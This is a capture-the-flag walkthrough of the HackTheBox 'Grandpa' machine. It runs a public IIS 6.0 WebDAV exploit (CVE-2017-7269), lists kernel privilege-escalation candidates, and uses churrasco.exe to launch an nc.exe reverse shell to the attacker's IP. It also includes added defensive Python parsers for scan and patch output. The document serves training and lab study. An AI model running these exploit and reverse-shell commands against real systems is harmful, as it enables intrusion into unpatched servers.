HTB Walkthrough: Grandpa

Today we are going to solve another HackTheBox machine, “Grandpa”, created by ch4p. This lab is in the retired section of HackTheBox and is mainly focused on kernel exploitation.

Level: Easy

Attack Strategy

  • Network scanning
    • Nmap
  • Enumeration
  • Manual exploit
    • CVE-2017-7269
  • Privilege Escalation
    • Non-Metasploit Windows exploit suggester
    • Kernel exploit

Walkthrough

IP address: 10.129.90.186

We start our enumeration with an Nmap scan in script and version-detection mode, which tells us the open ports and the services running on the target system.

nmap -sC -sV -p- 10.129.90.186

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 22:50 IST
Nmap scan report for 10.129.90.186
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Server Date: Fri, 14 May 2021 17:24:29 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
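The scan above shows IIS 6.0 with WebDAV answering, and the methods the server advertises ("Public Options") versus the ones it actually accepts for the probed path ("Allowed Methods"). As an added example (not from the original post), here is a small defender's check that parses that nmap text and turns it into hardening findings; the constructed excerpt and the read/write split of WebDAV methods are this example's own assumptions.

```python
"""Audit an `nmap -sC -sV` text report for WebDAV exposure on IIS, as a defender's
configuration check. NMAP_REPORT is a constructed excerpt copying the layout of
the scan above; the read/write method split below is this check's own policy."""
import re

NMAP_REPORT = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
"""

# WebDAV methods that only read metadata vs. those that create, change or lock resources.
WEBDAV_READ = {"PROPFIND", "SEARCH"}
WEBDAV_WRITE = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

def parse_webdav(report):
    """Port, service banner and the two method lists of the first open http port, or None."""
    svc = re.search(r"^(\d+)/tcp\s+open\s+http\s+(.*)$", report, re.M)
    if not svc:
        return None
    def methods(label):
        m = re.search(rf"^\|\s+{label}: (.*)$", report, re.M)
        return {x.strip() for x in m.group(1).split(",")} if m else set()
    return {"port": int(svc.group(1)), "service": svc.group(2).strip(),
            "public": methods("Public Options"), "allowed": methods("Allowed Methods")}

def webdav_findings(report):
    """Findings a hardening review would raise from the scan: WebDAV on, which
    state-changing methods are actually allowed, TRACE on, unsupported IIS release."""
    info = parse_webdav(report)
    if info is None:
        return []
    findings = []
    if info["allowed"] & (WEBDAV_READ | WEBDAV_WRITE):
        findings.append("webdav-enabled")
    write = sorted(info["allowed"] & WEBDAV_WRITE)
    if write:
        findings.append("webdav-write-methods:" + ",".join(write))
    if "TRACE" in info["allowed"]:
        findings.append("trace-enabled")
    if "IIS httpd 6.0" in info["service"]:
        # IIS 6.0 ships with Windows Server 2003, which left extended support in July 2015.
        findings.append("iis-6.0-unsupported")
    return findings
```

On the scan above the check reports WebDAV enabled with COPY, LOCK and UNLOCK accepted, TRACE enabled, and an unsupported IIS release; disabling the WebDAV extension is the fix that removes the whole class of findings at once.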

Enumeration

Now we have some useful information: port 80 is open and serving IIS 6.0, an old version. Visiting the page shows nothing of interest, but a simple Google search for exploits against this version leads to one available on GitHub.

After reading the exploit, we understand the arguments it needs: the target address and port, and the address and port of our reverse listener. If everything goes well, we get a netcat-based reverse shell.

git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
cd iis6-exploit-2017-CVE-2017-7269
ls
nano exploit.py
python exploit.py 10.129.90.186 80 10.10.14.79 4545

Privilege Escalation

Now that we have an initial foothold on the target, it is time to go for an elevated account, in simple language administrative access. We start enumerating the machine with the “systeminfo” command, which describes the Windows installation; it shows that no hotfixes are installed, which points us towards a kernel exploit. So we feed the systeminfo output to Windows Exploit Suggester (wesng) and get some results.

python wes.py ../systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Microsoft Windows Server 2003
    - Generation: 2003
    - Build: 3790
    - Version: None
    - Architecture: 
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20210508
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[+] Found vulnerabilities

Date: 20150714
CVE: CVE-2015-2365
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38267/

Date: 20150714
CVE: CVE-2015-2365
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38267/

Date: 20150714
CVE: CVE-2015-2366
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38266/

Date: 20150714
CVE: CVE-2015-2366
KB: KB3070102
Title: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/38266/

Date: 20141014
CVE: CVE-2014-4971
KB: KB2993254
Title: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://seclists.org/fulldisclosure/2014/Jul/97, https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt, https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt, http://seclists.org/fulldisclosure/2014/Jul/96, http://www.exploit-db.com/exploits/34112, http://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html, http://www.exploit-db.com/exploits/34982, http://www.exploit-db.com/exploits/34131

Date: 20141014
CVE: CVE-2014-4971
KB: KB2993254
Title: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://seclists.org/fulldisclosure/2014/Jul/97, https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt, https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt, http://seclists.org/fulldisclosure/2014/Jul/96, http://www.exploit-db.com/exploits/34112, http://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html, http://www.exploit-db.com/exploits/34982, http://www.exploit-db.com/exploits/34131

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20140114
CVE: CVE-2013-5065
KB: KB2914368
Title: Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37732/

Date: 20140114
CVE: CVE-2013-5065
KB: KB2914368
Title: Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37732/

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 1
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 1
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705

Date: 20140708
CVE: CVE-2014-1767
KB: KB2961072
Title: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/39525/, https://www.exploit-db.com/exploits/39446/

Date: 20140708
CVE: CVE-2014-1767
KB: KB2961072
Title: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/39525/, https://www.exploit-db.com/exploits/39446/

Date: 20110809
CVE: CVE-2011-1974
KB: KB2566454
Title: Vulnerability in Remote Access Service NDISTAPI Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40627/

Date: 20110809
CVE: CVE-2011-1974
KB: KB2566454
Title: Vulnerability in Remote Access Service NDISTAPI Driver Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40627/

Date: 20141111
CVE: CVE-2014-4076
KB: KB2989935
Title: Vulnerability in TCP/IP Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/exploits/35936, https://www.exploit-db.com/exploits/37755/

Date: 20141111
CVE: CVE-2014-4076
KB: KB2989935
Title: Vulnerability in TCP/IP Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/exploits/35936, https://www.exploit-db.com/exploits/37755/

Date: 20150512
CVE: CVE-2015-1701
KB: KB3045171
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/37049/, https://www.exploit-db.com/exploits/37367/

Date: 20150512
CVE: CVE-2015-1701
KB: KB3045171
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/37049/, https://www.exploit-db.com/exploits/37367/

Date: 20150113
CVE: CVE-2015-0004
KB: KB3021674
Title: Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://code.google.com/p/google-security-research/issues/detail?id=123

Date: 20150113
CVE: CVE-2015-0004
KB: KB3021674
Title: Vulnerability in Windows User Profile Service Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://code.google.com/p/google-security-research/issues/detail?id=123

Date: 20150714
CVE: CVE-2015-2370
KB: KB3067505
Title: Vulnerability in Windows Remote Procedure Call Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37768/

Date: 20150714
CVE: CVE-2015-2370
KB: KB3067505
Title: Vulnerability in Windows Remote Procedure Call Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/37768/

[+] Missing patches: 12
    - KB952004: patches 4 vulnerabilities
    - KB3070102: patches 4 vulnerabilities
    - KB956572: patches 4 vulnerabilities
    - KB2961072: patches 2 vulnerabilities
    - KB3045171: patches 2 vulnerabilities
    - KB2989935: patches 2 vulnerabilities
    - KB2393802: patches 2 vulnerabilities
    - KB2993254: patches 2 vulnerabilities
    - KB2566454: patches 2 vulnerabilities
    - KB3067505: patches 2 vulnerabilities
    - KB2914368: patches 2 vulnerabilities
    - KB3021674: patches 2 vulnerabilities
[+] KB with the most recent release date
    - ID: KB3070102
    - Release date: 20150714

[+] Done. Displaying 30 of the 1520 vulnerabilities found.
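The report above lists 30 entries but only 12 KBs, because wesng prints one entry per affected product edition, and the same CVE can even be fixed by two different KBs (CVE-2008-1436 via KB952004 and KB956572). As an added example (not part of the original post or of wesng), the following code parses that text layout and groups it into a per-KB patch plan; SAMPLE is a constructed excerpt in the report's format, not the full output.

```python
"""Parse the text report that wesng prints (layout as above) into a per-KB patch plan.
SAMPLE is a constructed excerpt in that layout, not the full report; the grouping
logic is an added check, not part of wesng itself."""
import re
from collections import defaultdict

SAMPLE = """\
CVE: CVE-2015-2365
KB: KB3070102
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Exploit: https://www.exploit-db.com/exploits/38267/

CVE: CVE-2015-2365
KB: KB3070102
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Exploit: https://www.exploit-db.com/exploits/38267/

CVE: CVE-2008-1436
KB: KB952004
Affected product: Microsoft Windows Server 2003 x64 Edition
Exploit: https://www.exploit-db.com/exploits/6705

CVE: CVE-2008-1436
KB: KB956572
Affected product: Microsoft Windows Server 2003 x64 Edition
Exploit: https://www.exploit-db.com/exploits/6705
"""

# "Key: value" lines; the key charset excludes ':' so URLs in values are left intact.
FIELD = re.compile(r"^([A-Za-z ]+): ?(.*)$", re.M)

def parse_wesng(text):
    """One dict per blank-line-separated block that carries both a CVE and a KB."""
    blocks = (dict(FIELD.findall(b)) for b in re.split(r"\n\s*\n", text.strip()))
    return [b for b in blocks if "CVE" in b and "KB" in b]

def patch_plan(text):
    """Group entries by KB. wesng prints one entry per affected edition, so a CVE
    repeats; the distinct CVEs and exploit links per KB are what a patch plan needs."""
    plan = defaultdict(lambda: {"entries": 0, "cves": set(), "exploits": set()})
    for e in parse_wesng(text):
        kb = plan[e["KB"]]
        kb["entries"] += 1
        kb["cves"].add(e["CVE"])
        links = e.get("Exploit") or e.get("Exploits", "")
        kb["exploits"].update(u.strip() for u in links.split(",") if u.strip())
    # Most distinct CVEs first, then most entries, then KB id for a stable order.
    return sorted(plan.items(), key=lambda kv: (-len(kv[1]["cves"]), -kv[1]["entries"], kv[0]))
```

Because the Architecture line in the report above is blank, wesng lists every Server 2003 edition; filtering the parsed entries on "Affected product" before grouping narrows the plan to the edition actually installed.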

Windows Exploit Suggester lists various exploits. After trying some of them we settle on one that you can get from the pentestskyoffical GitHub page. We transfer the binary to the target system and spawn a reverse shell over netcat.

We transfer both binaries over a temporary SMB server hosted with Impacket into a writable location, i.e. the Temp directory.

copy \\10.10.14.79\share\nc.exe .
copy \\10.10.14.79\share\churrasco.exe .

Once everything is in place it is time to fire the kernel exploit. You can also learn more about this exploit from here and here.

.\churrasco.exe -d "nc.exe -e cmd.exe 10.10.14.79 1234"

Great, we have our administrative shell, and we grab both the user and the root flag.

type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Harry\Desktop\user.txt"
